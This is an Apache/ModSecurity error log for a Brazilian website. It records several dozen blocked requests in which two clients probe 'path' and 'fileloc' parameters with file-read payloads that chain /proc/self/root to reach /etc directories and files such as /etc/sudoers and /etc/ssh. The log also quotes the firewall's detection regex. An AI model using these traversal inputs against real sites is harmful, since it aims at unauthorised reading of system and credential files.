[Tue Mar 17 16:41:47.802236 2026] [:error] [pid 6296:tid 140411699963648] [client 74.7.241.31:56368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmue3Ik7brgkOH-rIWb9wAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:49.209019 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:56384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmufda6ubjKNq_cu4YYMwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:52.020258 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.31:56396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmugKBJNF7axNlVR0UoawAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:54.244423 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:56398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmugtY0UrI5A3LftIwNTQAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:56.550591 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.241.31:56400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuhHIk7brgkOH-rIWb_AAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:41:58.254620 2026] [:error] [pid 2598:tid 140411699963648] [client 216.73.216.191:6649] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuhhj0p0SRWAqcjGGJlAAAAwU"]
[Tue Mar 17 16:41:58.679454 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:51614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuhtY0UrI5A3LftIwNUAAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:00.129887 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51670] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:42:01.473685 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:51630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuida6ubjKNq_cu4YYNwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:03.398011 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.241.31:51634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuiq4xEDsg_V3ESNZbRgAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:04.740112 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.241.31:51640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmujAeiSKl8TjouI-YntQAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:06.019300 2026] [:error] [pid 7437:tid 140411607643904] [client 216.73.216.191:16218] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmujgeiSKl8TjouI-YnuAAAA9A"]
[Tue Mar 17 16:42:06.131463 2026] [:error] [pid 7004:tid 140411716749056] [client 74.7.241.31:51642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmujsU6Sx0TG1YjmQi-dgAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:08.872568 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:41942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuj9Y0UrI5A3LftIwNUgAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:10.178503 2026] [:error] [pid 6296:tid 140411725141760] [client 74.7.241.31:41956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuknIk7brgkOH-rIWb_gAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:11.597982 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.241.31:41958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmuk8U6Sx0TG1YjmQi-eAAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:13.879912 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.241.31:41966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmulRj0p0SRWAqcjGGJmAAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:16.060120 2026] [:error] [pid 6296:tid 140411708356352] [client 74.7.241.31:41976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmumHIk7brgkOH-rIWcAAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:18.517920 2026] [:error] [pid 25836:tid 140411741927168] [client 74.7.241.31:43236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmumYh-PF_25v4hFRB7KAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:20.635422 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.241.31:43238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmunHIk7brgkOH-rIWcBQAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:22.110886 2026] [:error] [pid 25836:tid 140411683178240] [client 74.7.241.31:43242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmunoh-PF_25v4hFRB7LgAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:22.311047 2026] [:error] [pid 25836:tid 140411590858496] [client 74.7.241.31:43242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmunoh-PF_25v4hFRB7LwAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:42:23.125760 2026] [proxy_fcgi:error] [pid 18380:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52172] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:42:23.709210 2026] [:error] [pid 29151:tid 140411666392832] [client 74.7.241.31:43244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmun_PqhzTj3BvfDX-XywAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
